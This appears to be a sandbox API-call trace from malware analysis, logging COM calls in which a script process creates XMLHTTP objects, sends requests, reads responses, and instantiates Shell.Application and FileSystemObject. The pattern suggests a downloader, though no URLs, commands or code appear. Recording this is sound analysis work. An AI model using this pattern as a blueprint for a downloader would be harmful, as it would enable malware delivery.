	[0338.070] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0338.070] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0338.070] ??2@YAPEAX_K@Z () returned 0x62f310
	[0338.070] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0338.070] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0338.070] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.070] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0338.071] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0338.071] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0338.823] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0338.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0338.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0338.823] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0338.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0338.824] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0338.824] SysStringLen (param_1=0x0) returned 0x0
	[0338.824] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0338.824] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0338.824] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0338.824] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0338.824] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0338.824] ??2@YAPEAX_K@Z () returned 0x62f350
	[0338.824] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0338.824] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0338.824] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0338.824] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0338.824] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0338.825] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0338.825] SysStringLen (param_1=0x0) returned 0x0
	[0338.825] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0338.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0338.828] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0338.828] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0338.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0338.829] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0338.829] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0339.557] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0339.558] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0339.558] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0339.559] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0339.559] SysStringLen (param_1=0x0) returned 0x0
	[0339.559] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0339.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0339.560] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0339.560] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0339.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0339.560] ??2@YAPEAX_K@Z () returned 0x62f310
	[0339.560] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
	[0339.560] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0339.560] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0339.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0339.560] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0339.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.560] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0339.563] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.563] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0339.563] SysStringLen (param_1=0x0) returned 0x0
	[0339.563] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0339.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0339.564] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0339.564] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0339.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0339.564] ??2@YAPEAX_K@Z () returned 0x62f330
	[0339.564] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0339.564] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0339.564] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0339.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0339.564] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0339.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.564] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0339.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.565] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0339.565] SysStringLen (param_1=0x0) returned 0x0
	[0339.565] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0339.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0339.565] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0339.565] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0339.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0339.565] ??2@YAPEAX_K@Z () returned 0x62f310
	[0339.565] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0339.565] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0339.565] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0339.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0339.565] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0339.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.566] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0339.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.566] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0339.566] SysStringLen (param_1=0x0) returned 0x0
	[0339.566] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0339.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
